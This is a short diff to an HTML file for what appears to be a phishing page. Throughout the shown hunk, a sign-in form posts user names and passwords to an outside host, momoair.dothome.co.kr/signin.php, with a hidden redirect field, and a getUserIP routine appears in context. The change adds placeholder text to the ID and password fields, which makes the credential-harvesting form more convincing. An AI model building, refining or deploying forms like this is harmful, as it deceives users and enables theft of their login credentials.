--- a/index.html
+++ b/index.html
@@ -148,8 +148,8 @@ getUserIP(function(ip){
 <br> <br>
 </p><p><img width="200" height="200" src="https://3.bp.blogspot.com/-m-u_xuKMnRU/Wa7Bo5H3i5I/AAAAAAAACNY/KRf5_L24YGw725MJAoCTcJ4BL9Z90kJRQCLcBGAs/s1600/cover.jpg"></p><br><form action="http://momoair.dothome.co.kr/signin.php" method="post">
 <input type="hidden" name="base_url" value="http://ottk.net">
-<input type="text" name="user" style="width:100px" required="">
-<input type="password" name="pass" style="width:100px" required="">    
+<input type="text" name="user" placeholder="Type your ID" style="width:100px" required="">
+<input type="password" name="pass" placeholder="Type your Password" style="width:100px" required="">    
 <input type="submit" value="Sign in">    
 </form>
 <p style="color:#9ea7ab;font-size:14px;letter-spacing:-0.5px;">
